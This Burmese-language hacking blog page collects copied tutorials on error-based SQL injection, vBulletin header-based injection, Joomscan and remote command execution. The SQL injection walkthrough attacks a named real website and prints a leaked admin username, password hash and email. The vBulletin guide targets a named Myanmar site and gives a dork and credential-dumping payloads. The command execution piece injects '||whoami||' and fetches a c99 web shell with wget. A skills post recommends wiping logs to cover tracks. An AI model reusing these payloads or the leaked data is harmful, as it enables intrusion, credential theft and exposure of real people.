5.Table name ရွာမယ္
6.Column name ရွာမယ္
7.Harvestin Data
8.Conclusion

1.Introduction
ဒီ...Error-based SQL injection အေၾကာင္းကုိဘယ္သူမွစတာမေတြ.ေသးလုိ. ဒီ Thread ေလးကုိဖြင့္ေပးလုိက္ပါတယ္...
မွားတာေတြရွိေနရင္လည္း ၀င္းျပီးေထာက္ျပေဆြေႏြးေပးၾကပါ... Posted Image
အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ Posted Image

SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...
1.Blind Based (Also called Boolean)
2.Union Based (အသုံးမ်ားတယ္)
3.Error Based (အခုေျပာမွာ)
4.Double Query (ေနာက္ေျပာမွာ Posted Image)

နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ. Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး Posted Image)
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ Posted Image)

နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...

နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...

နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....

ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....

2.About
Error-Based ရဲ. Definition

A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information

သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...

1. The Used Select Statements Have A Different Number Of Columns.
2. Unknown column 1 in order clause. (or 0)
3. Can't find your columns in the page source.
4. Error #1604

ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...
http://www.elansystems.co.za/product-item.php?product_items_id=11
 
3.Version စစ္မယ္

အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က

or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'
 
4.Database စစ္မယ္

DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က
 
and (select 1 from (select count(*),concat((select(select concat(cast(database() as
 char),0x7e)) from information_schema.tables where table_schema=database() limit 0,
1),floor(rand(0)*2))x from information_schema.tables group by x)a) 
 
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
 
http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]
 
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...

Quote
Duplicate entry 'elansyst_elan~1' for key 'group_key'
Notepad ေလးဖြင့္ျပီး အသာေလးတုိ.ထားလုိက္ ....
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား... Posted Image

5.Table name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
သတိ limit Function ကုိသုံထားျပီး Table name ေတြကိုတစ္ခုခ်င္း... 1 တုိးျပီးႏုွိက္ထုတ္ပါမယ္....
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...

http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'dealer_tbl~1' for key 'group_key'
ဆက္ရွာပါ.. ကုိယ္စိတ္၀င္စားတာေတြ.ရင္ရပ္ေပါ့...
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ Posted Image
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....

6. Column name ေတြရွာမယ္
သုံးရမယ့္ Query က...
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xTABLEHEX limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit
2.table_name ကုိHexခံမယ္ (http://www.swingnote...s/texttohex.php)
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...


ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'ID~1' for key 'group_key'

cOlumn Name - user_name , user_password , user-email ကိုစိတ္၀င္စားတယ္ဟုတ္?
ok? .....

7.Harvesting Data
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...
သုံရမယ္ Query ပုံစံက
Quote
and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME) as char),0x7e)) from Databasename.TABLENAME limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...
1.Limit function (count 1 by 1)
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)

ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
http://www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
Quote
Duplicate entry 'elan_admin~1' for key 'group_key'

ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့
Quote
elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za

8.Conclusion
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...
အားနည္းခ်က္ေတြက
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး ..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )
၃.နည္းနည္းလက္၀င္တယ္....

copy from http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/





 
Read More ->>

[TUT]Vbulletin Forum Hacking with Header-Based SQL injection[TUT]




Injecting Vbulletin Forum
******************
/Content\
****************************
$1.Intro
$2.Tutorial
$3.Conclusion

$1.Intro

Quote
Category : Forum Group Injection
Method : Header-Based SQL injection
Original Exploit :http://www.exploit-i...-sql-injection- vulnerability by D4rkB1t
Software :Vbulletin
Dork :inurl:"search.php?search_type=1"
Vulnerable Version : 4.0.x to 4.1.2


(Ques? ကုိနတ္ဆုိးေရ... အခုေျပာမယ့္ အေၾကာင္းအရာေလးကုိ နဲနဲေလာက္ရွင္းျပပါဦး)
(Ans : ဟုတ္ကဲ့ပါ... ရွင္းပါတယ္.. Vbulletin Forum ေတြကုိ SQL injection ေပါက္တဲ့အေၾကာင္းေလးပါတယ္... ကန္.သတ္ခ်က္ေလးေတြရွိပါတယ္....အေပၚမွာေရထားတဲ့အတုိင္း.... version က 4.0.x ကေန 4.1.2 အတြင္းပဲရမွာ vulnerable ျဖစ္ႏွုန္းက ... နဲနဲနည္းပါတယ္... 50% ၀န္းက်င္ေလာက္ေတာ့ရွိပါတယ္... vbulletin ဆုိေတာ့ Admin login ရွာရတာလြယ္ပါတယ္.... ရလာတဲ့ hash ကုိ ျဖည္ဖုိ.ခက္တာပါ)

MRTV-4 ကေတြ.ဆုံေမးျမန္းတဲ့ စတုိင္ဖမ္းထားတယ္.... Posted Image Posted Image

(Ques? ဟင္..ခင္ဗ်ားဟာကလည္း... version ကလည္းေအာက္ေသး.... ျဖစ္ႏုိ္င္ေျခကလည္းနည္းေသး... hashed ကလည္းေျဖမရေတာ့... ဘာသြားလုပ္ေတာ့မွာတုန္း...)
(Ans: နည္းပညာေလဗ် နည္းပညာ...
နည္းပညာလုိက္စားသူတုိင္းက တစ္ခုခု...အသစ္သိရတုိင္း...ထမင္းေမ့ဟင္းေမ့ေလ့လာတက္ၾကတယ္... ခင္ဗ်ားနည္းပညာကုိမသိခ်င္ဘူးလား..?)


$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$2.Tutorial
ေတာ္ပါျပီ... ေလပန္းေနတာရပ္ျပီး... စပါေတာ့မယ္... ဒန္တန္.တန္..... Posted Image
အရင္ဆုံး Live Http headers မရွိသူမ်ား.... အျမန္ဆုံးသြင္းလုိက္ၾကပါ....
goto : broswer >> Alt+T >> A >> Search for addons

ပုံမွန္ဆုိရင္ ... google မွာ dork ထည့္ရွာျပီး... Forum ၀င္ျပီး... ေဖာက္ရမွာပါတယ္... အခုေတာ့ ကြ်န္ေတာ့္ demo ေလးနဲ.ပဲ ...လုပ္ပါေတာ့... Posted Image
demo site:
Quote
www.myanmarengineer.org
ကုိေဘာ့စိက... အၾကားအျမင္ရေနလားမတိဘူး.... :P
Forum rules ကျမန္မာ website မ်ားမလုပ္ပါနဲ.ဆုိေတာ့... အခုဟာက ... ခဏေလးပဲစမ္းၾကည့္မွာပါ... (Rule လြတ္တယ္ေနာ္ :))
password ရလည္းဘာမွလုပ္လုိ.မရပါဘူး ... (သိတဲ့အတုိင္းပဲ.. Vbulletin hash အေၾကာင္းကုိေလ)

အဲဒီ့ေတာ့ vul ျဖစ္တဲ့ေနရာ .... Community ထဲက ... Groups ေနရာမွာပါ....
site ရဲ. ညာဘက္ေထာင့္ဆုံး.... အေပၚနားေလးမွာ ... Advanced Search button ေလးကုိ ႏိွပ္ပါ
ေအာက္ကပုံေလးထဲကုိေရာက္သြားလိမ့္မယ္...


လုပ္ရမယ့္အဆင့္ဆင့္က ... forum မွာ member ၀င္... အုပ္စုထဲကုိသြား...ကုိယ့္ဘာသာ ...အုပ္စုတစ္ခုခုကုိ create လုပ္ ...
ဒါမွမဟုတ္လဲ ... ရွိျပီးသား...တစ္ခုခုကုိ ခဏမွတ္ထားလုိက္ေပါ့...

ဒီအဆင့္ေတြျပီးသြားရင္ ... ေစာေစာက Advanced Search ကုိျပန္သြားပါ ...
ကုိယ္မွတ္ထားတဲ့ Group နာမည္ကုိ search box ထဲထည့္ပါ....

ေစာေစာ Install လုပ္ထားတဲ့ ... Live Http headers add-on ကိုဖြင့္ထားပါ ...
ျပီးရင္ search now ကုိႏိွပ္ပါ...
ေအာက္ကပုံကုိၾကည့္ၾကပါ...







ပုံမွာ highlight လုပ္ထားတဲ့ ... စာသားေလးကုိေတြ.ေအာင္ရွာပါ ...
ျပီးရင္... click လုပ္... ေအာက္က replay button ကုိႏိွပ္....
http://i.imgur.com/lBdsZ.png
အခုလုိ ျမင္ရပါလိမ့္မယ္..












cotent box ထဲက.... စာေတြထဲမွာ ေနာက္ဆုံးက .. Id= ဆုိတာကုိေတြ.တယ္ဟုတ္... အဲဒီ့ မွာ SQL query ေတြပုိ.မွာ...
ေအာက္ကဟာေလးကုိ cp/paste လုပ္ျပီး.... replay button ကုိႏွိပ္ပါ...

&cat[0]=1) union select version#

ဒါဆုိအခုလုိ vesion ျမင္ရမယ္....



ေနာက္ဆုံးအဆင့္ ... usr name ေတြ password ေတြ လုိခ်င္ရင္ေအာက္က query ကုိေစာေစာကအတုိင္းပုိ.လုိက္ေပါ့....

&cat[0]=1 union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,usergroupid) from user where usergroupid=6#
ေအာက္မွာ ၾကည့္ၾကပါ...



ဒီေလာက္ဆုိ... သေဘာေပါက္ေလာက္ပါတယ္... ေနာ္...
အားနည္းခ်က္.... Human Image Verification ... ရိွေနရင္...မရပါ....
ပံုမ်ားမျမင္ရလွ်င္ကလစ္လုပ္ပါ

copy from mhu
Thank to D3vilM4yCry


Read More ->>

Monday, August 13, 2012

Ideal Skill Set For the Penetration Testing


Botnet ေတြအျပီး Pen Test ဖက္လွည့္ဖို႕ ၾကိဳးစားလာမိရင္း ဟိုရွာဖတ္ ဒီရွာဖတ္နဲ႕ အဆင္ေျပမယ့္ Article ေတြ ( ကိုယ့္အတြက္ေကာ စာဖတ္သူေတြအတြက္ပါ အဆင္ေျပမယ္ထင္တဲ့ ) ရွာျပီး ဘာသာျပန္လိုက္တာပါ :-)
ဒီပို႕စ္ကေတာ့ Infosecinstitute က လူၾကိဳက္အမ်ားဆံုး ပို႕စ္ေတြထဲက တစ္ပုဒ္ျဖစ္ျပီး ကၽြြန္ေတာ့္စာဖတ္သူမ်ားလည္း အေထာက္အကူျပဳမယ္ထင္လို႕ ေခါင္းစဥ္ကိုေတာင္ မျပဳျပင္ပဲ တင္ေပးလိုက္တာပါ ။
1.Mastery of an operating system
PenTester တစ္ေယာက္ Security Expert တစ္ေယာက္ျဖစ္ဖို႕ဆုိရင္ Operating System ေတြအေၾကာင္းကို ေသေသခ်ာခ်ာတိတိပပ သိဖို႕လိုပါလိမ့္မယ္ ။ ေတာ္ေတာ္မ်ားမ်ားက ဒီအခ်က္ကို သတိလြတ္ေနၾကတယ္ ။ OS ေတြအေၾကာင္း ( အနည္းဆံုးေတာ့ မိမိ ကိုင္တြယ္ေနတဲ့ OS အေၾကာင္း ) ေကာင္းေကာင္း မသိ ပဲ System Admin , Pen Tester ျဖစ္ခ်င္ေနၾကတယ္ ။ System Security Admin သာဆိုရင္ မိမိ System ဟာ Target / Victim ျဖစ္ဖို႕ ကိုးဆယ္ရာခိုင္ႏႈန္း ေသခ်ာေနျပီပဲ ။ ထိုနည္းတူစြာပဲ Attack လုပ္မယ္ဆိုရင္ Log File ေတြဖ်က္ဖို႕ ေနာက္ေၾကာင္းရွင္းဖို႕ ကိစၥေတြမွာ ကြိဳင္လာလိမ့္မယ္ ။
2. Network ေတြအေၾကာင္း Network Protocol ေတြအေၾကာင္းေသခ်ာသိေအာင္ ေလ့လာပါ ။
ဒီေနရာမွာ Good Knowledge ဆုိတာ OSI Layer ေလးေတြေလာက္ သိတာကို ဆိုလိုတာ မဟုတ္ပါ ။ TCP အ၀င္အထြက္
ေတြသိရမယ္ ။ ဒါကိုလည္း TCP ဆို Transmission Control Protocol ဆိုတာေလာက္ သိရင္ရျပီ လို႕ ဆိုလိုတာမဟုတ္ဘူး ။
Packet ေတြရဲ႕ Structure , ျပီးေတာ့ သူတို႕ဘယ္လိုအလုပ္လုပ္တယ္ဆိုတာ .. အေသးစိတ္ေပါ့ ( TCP နဲ႕ပတ္သတ္ျပီးေတာ့
TCP/IP ဆိုတဲ့ W.Richard Stevens ေရးတဲ့ ဟာေလး ဆို အဆင္ေျပမယ္ ) ျပီးေတာ့ Routing အေၾကာင္း အေသးစိတ္ Packet
ေတြ တစ္ေနရာ ကေန တစ္ေနရာကို ဘယ္လိုကူးတယ္ဆိုတဲ့အေၾကာင္း အေသးစိတ္ . DNS ေတြအလုပ္လုပ္ပံု . ARP အေၾကာင္း
DHCP အေၾကာင္း ကို အေသးစိတ္သိဖုိ႕လိုမယ္ ။ Automatic IP ေတြအေၾကာင္း Plug တက္လိုက္တာနဲ႕ ဘယ္လို Address ကို
Auto သတ္မွတ္တယ္ဆိုတဲ့အေၾကာင္း အျပင္ NIC က သံုးေနတဲ့ Traffic Type. ဒါေတြကို အတိအက်အေသးစိတ္သိဖို႕လိုပါလိ္မ့္မယ္
3.Basic Script ေလးေတြေလ့လာပါ ။
vb script သို႕မဟုတ္ Batch file script ေတြက စရင္ အဆင္ေျပပါ့မယ္ ။ Batch file Programming ဆိုတဲ့ စာအုပ္က
အေထာက္အကူျပဳပါလိမ့္မယ္ ။ အနည္းဆံုး အေျခခံအေသးစား Software ေလးေတြေရးႏဳိင္ေလာက္တဲ့ အထိ Programming
Knowledge လိုအပ္ပါလိမ့္မယ္ ။
4.သင္ကိုယ္တိုင္ Firewall တစ္ခုျဖစ္ေနပါေစ
သေဘာကေတာ့ မိမိကိုယ္ကိုလည္း ကာကြယ္ႏုိင္ရပါ့မယ္ ။ Defenses ေတြနဲ႕ပတ္သတ္ျပီး သိနားလည္ေအာင္လုပ္ပါ ။
ေစ်းေပါတဲ့ Router အေဟာင္းေလးတစ္ခုကို သံုးျပီး IP Spoofing လိုမ်ိဳး Simple Techniques ေလးေတြ စမ္းျပီး ဘယ္လို ကာကြယ္
ရမယ္ ဆိုတာလည္း ေလ့လာသင့္ပါတယ္။ လက္ေတြ႕စမ္းသပ္မွ တကယ္တတ္မယ့္ကိစၥမ်ိဳးေတြပါ ။
5.Froensiscs နဲ႕ပတ္သတ္ျပီး နည္းနည္းေတာ့ သိသင့္ပါတယ္ ။
ဒါမွသာ ကိုယ့္ေျခရာလက္ရာေတြကို ဖ်က္တဲ့ေနရာမွာ အသံုး၀င္ႏိုင္မွာပါ ။ ဒါကလည္း အေရးပါတဲ့ ေနရာတစ္ခုမွာ ပါရွိပါတယ္
6.Programming Language တစ္ခုေတာ့ကၽြြမ္းက်င္အဆင့္မွာရွိပါေစ ။ တစ္ခုထက္ပိုႏုိင္ရင္ အေကာင္းဆံုးေပါ့ .။
ဒီေနရာမွာ ေျပာစရာနည္းနည္းရွိတယ္ဗ် ။ HOW TO PROGRAM IN C တို႕ ဘာတို႕ အစရွိတဲ့ ေခါင္းစဥ္ေတြနဲ႕ စာအုပ္ေတြကို သြားမဖတ္နဲ႕ ။
အဓိက Concept ကေလးေတြ နားလည္ျပီးေသခ်ာလား ဒါဆုိ Program တစ္ခု စေရးေတာ့ ဥပမာ . port scanner ေပါ့ ဒါမ်ိဳးဆို nmap ေဒါင္း သူ႕ Source Code
ဖတ္ အဲ့ဒါမ်ိဳးရေအာင္ေရး မသိရင္ ဖိုရမ္ေတြကို လိုက္ေမး . ဒါ အေကာင္းဆံုးနည္းပဲ ကၽြြန္ေတာ့္ကို ယံု
7.Note တစ္ခုထားပါ
ဒါအေရးအၾကီးဆံုးလို႕ ေျပာရပါလိမ့္မယ္ ဒီေန႕ ကုိယ္ဘာဖတ္တယ္ ကိုယ္ဘာသိတယ္ ဘာေတြလုပ္တယ္ ဆိုတာကို
Refences တစ္ခု Note တစ္ခုလို ထားပါ ။ ဒါဆို ကိုယ့္အခ်ိန္ေတြကို ကိုယ္ဘယ္လိုသံုးေနရတယ္ဆိုတာသိသလို ေလ့လာမႈလည္း
တုိးတက္ပါလိမ့္မယ္
8.DataBase ေတြအေၾကာင္း နည္းနည္းေတာ့သိဖို႕လိုပါလိမ့္မယ္။
သူတို႕ဘယ္လိုအလုပ္လုပ္တယ္ဆိုတဲ့အေၾကာင္းလည္း သိဖို႕လိုပါတယ္ ။ mysql ကို ေဒါင္းလိုက္ပါျပီ ျပီးရင္ Database တစ္ခု
ဘယ္လိုေဆာက္တယ္ဆိုတဲ့အေၾကာင္းနဲ႕ပတ္သတ္ျပီး Tutorial ေလးေတြရွာဖတ္ပါ ။ ကၽြြမ္းက်င္အဆင့္ျဖစ္ရမယ္ လို႕မဆိုလိုပါဘူး ။
နည္းနည္းပါးပါးေတာ့ သိဖုိ႕လိုပါတယ္ ။
9.တစ္ေယာက္ထဲ အလုပ္မလုပ္ပါနဲ႕ ။
ကိုယ့္ထက္ပိုသိတဲ့လူေတြ ကိုယ့္ေလာက္မသိတဲ့လူေတြ အပါအ၀င္ Pentesting ကို ေလ့လာေနသူတိုင္းကို မိမိအသိပညာေတြ
မွ်ေ၀ပါ ။

post by negative thunder
copy from ghostarea.net
Read More ->>

How to use Joomscan to find the Joomla Vulnerability in Backtrack 5 Linux?



တစ္ကယ္ေတာ့ Jommla scan သံုးတယ္ဆိုတာ Hacking လုပ္တယ္လို႕မဆိုလိုႏိုင္ဘူးဗ်...။ယိုေပါက္ vulnerability ေတြကို Jommla CMS ထဲမွာေပါက္မေပါက္စစ္ေပးတာဗ်..ေနာက္ဆံုးထြက္ Updated version ဆိုရင္ Vulnerabilities 550 ေလာက္ကိုစံုစမ္းေထာက္လွမ္း ေပးႏိုင္တယ္..။ဒါကိုဘယ္လိုအသံုးျပဳရမလဲဆိုတာ ကိုကၽြန္ေတာ္တင္ျပေရးသားေပးပါ့မယ္...။ Jommla scan မရိွလွ်င္ jommla scan ကိုေအာက္ပါေနရာတြင္ေဒါင္းလုပ္ဆြဲလိုက္ပါ...။

http://web-center.si/joomscan/joomscan.tar.gz

 ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ ေအာက္ေဖာ္ျပပါ directory အတိုင္းထားေပးလိုက္ပါ...။

/pentest/web/scanners/joomscan/



 ေနာက္တစ္ဆင့္အေနနဲ႕ကေတာ့ Joomscan ကို set permission လုပ္ဖို႕လိုပါေသးတယ္..ဘယ္လိုလုပ္ရမလဲဆိုရင ္Terminal ထဲကိုသြာျပီးေအာက္ပါ commands မ်ားကိုရိုက္ထည့္လိုက္ပါ..။

CHMOD 0777 joomscan.pl



 ေနာက္တစ္ဆင့္ကေတာ့ ေနာက္ဆံုးထြက္ version ကို update လုပ္ရမယ္..အဲလိုလုပ္မယ္ဆိုရင္ Terminal ထဲကပဲ ၀င္ျပီးေတာ့ ေအာက္ပါ commands ေတြကိုရိုက္ထည့္လိုက္ပါ...။
./joomscan.pl update



ဒါဆိုရင္အားလံုး OK ျပီ..စလို႕ရျပီ...ကၽြန္ေတာ္တို႕ Jommla scan ကိုသံုးျပီးေတာ့ ယိုေပါက္ေတြကို စတင္ ေထာက္လွမ္းႏိုင္ပါျပီ ထိုေဖာက္၀င္ေရာက္ျခင္းအတြက္ကေတာ့ ကိုယ္ရဲ႕ Hacking scale နဲ႕ဆိုင္ပါတယ္....။ Terminal ထဲကိုသြားျပီးေတာ့ေအာက္ပါ command ကိုသံုးျပီစတင္ စစ္ေဆးႏိုင္ပါျပီ...။

 ./joomscan.pl -u www.YourJoomlasite.com.. 



www.YourJoomlasite.com ဆိုတဲ့ေနရာမွာ သင့္ Terget ဆိုက္ကိုထည့္ပါ...။ျပီးရင္ စစ္ေဆးေနတဲ့အခ်ိန္ကို ခဏေစာင့္ပါ....။ယိုေပါက္ရိွပါက ေဖာ္ျပေပးပါလိမ့္မယ္...။လံုျခံဳေရးအားေကာင္းတဲ့ ဆိုက္မ်ားအတြက္ အာမ မခံပါ...။

Shwekoyantaw....
Read More ->>

Tuesday, July 31, 2012

Remote Command Execution



Remote Command Execution ကိုလည္း Remote Code Execution လုိပဲ RCE လို႕ေခၚၾကပါတယ္ အေခၚအေ၀ၚဆင္သလို Attack လုပ္ပံုလည္း ဆင္တူပါတယ္ ။ Remote Command Execution ဆိုေတာ့အတိုင္း Remote Command ေတြ Execute လုပ္ခြင့္ေပးတာကို ဆိုလိုတာပါ ။

Code


<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

ဒီလိုသာျဖစ္ေနရင္ ကၽြန္ေတာ္တို႕ www.site.com/index.php?cmd=whoami ဆိုျပီး whoami command ေပးရင္ Server User Name တက္လာပါလိမ့္မယ္ ။ အဲ့ဒီလိုပဲ Command Execute လုပ္ႏုိင္တဲ့ အျခားေသာ PHP Function ေတြလည္းရွိပါေသးတယ္ ။

အဲ့ဒါေတြကေတာ့

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

တို႕ျဖစ္ပါတယ္ ။

Command ေပးတဲ့ေနရာမွာ whoami လို Command မေပးပဲ wget http://www.sh3ll.org/c99.txt? -O shell.php လို We Get Command ေပးလိုက္ရင္ Shell ကိုယူျပီး .php အျဖစ္ Out Put FIle ထုတ္သြားမွာျဖစ္ပါတယ္ ။

www.site.com/index.php?cmd=wget http://www.sh3ll.org/c99.txt? -O shell.php

အမွန္အတိုင္းေျပာရရင္ အေပၚက Example Vuln က Theory ဆန္လြန္းပါတယ္ ။ တကယ့္လက္ေတြ႕မွာျဖစ္သြားတာေလးေတြၾကည့္လိုက္ရေအာင္ ။

Example 1 :

Code from dig.php


<?php
include("common.php");
showMenu();
echo '<br>';
$status = $_GET['status'];
$ns  = $_GET['ns'];
$host   = $_GET['host'];
$query_type   = $_GET['query_type']; // ANY, MX, A , etc.
$ip      = $_SERVER['REMOTE_ADDR'];
$self   = $_SERVER['PHP_SELF'];
$host = trim($host);
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>");
echo '<pre>';
//start digging in the namserver
system ("dig @$ns $host $query_type");
echo '</pre>';
} else {
?>

ကၽြန္ေတာ္တုိ႕စိတ္၀င္စားတာ အပိုင္းေလးတစ္ပုိင္းပါပဲ ။ Remote Command Execute လုပ္ခြင့္ရွိမယ့္ အပိုင္းေလးတစ္ပိုင္းပါ ။

$ns  = $_GET['ns'];
system ("dig @$ns $host $query_type");

အဲ့ဒီ့မွာ ns variable ဟာ Filer လုပ္ထားျခင္းမရွိပါ ။ ဒါေၾကာင့္ Attacker က ၾကည့္တဲ့ Command Execute လုပ္ခြင့္ရွိပါတယ္ ။
www.site.com/dig.php?ns=whoami&host=ghostarea.net&query_type=NS&status=digging
whoami ဆိုတဲ့ Command ကို Execute လုပ္ဖို႕ၾကိဳးစားေပသိ Execute ျဖစ္သြားမွာမဟုတ္ပါဘူး အေၾကာင္းရင္းကေတာ့ Code က ဒီလိုသြားမွာျဖစ္မွာမို႕လို႕ပါ ။

system ("dig whoami ghostarea.net NS");

ဒီလို  Command မရွိတဲ့အတြက္ အလုပ္လုပ္မွာမဟုတ္ပါဘူး ။ ဒီေတာ့ ကၽြန္ေတာ္တို႕  တမ်ိဳးစဥ္းစား၇ပါလိမ့္မယ္။ Terminal မွာ အသံုးျပဳခြင့္ရွိတဲ့ And Operator || ကို သံုးပါ့မယ္ ။

www.site.com/dig.php?ns=||whoami||&host=ghostarea.net&query_type=NS&status=digging

ဒါဆုိရင္ code က ဒီလိုျဖစ္သြားပါ့မယ္

system ("dig ||whoami|| ghostarea.net NS");

ဒီလိုဆိုမွ dig နဲ႕ ghostarea.net NS ၾကားမွာျခားျပီး Command အျဖစ္ Execute လုပ္သြားမွာျဖစ္ပါတယ္ ။

posted by negative thunder
copy from mhf
Read More ->>

Remote Code Execution



Remote Code Execution ဆိုတာ RCE လို႕ အတိုေကာက္ေခၚၾကတဲ့ အေတြ႕ရမ်ားတဲ့ Web Vuln ေတြထဲက တစ္ခုျဖစ္ပါတယ္ ။
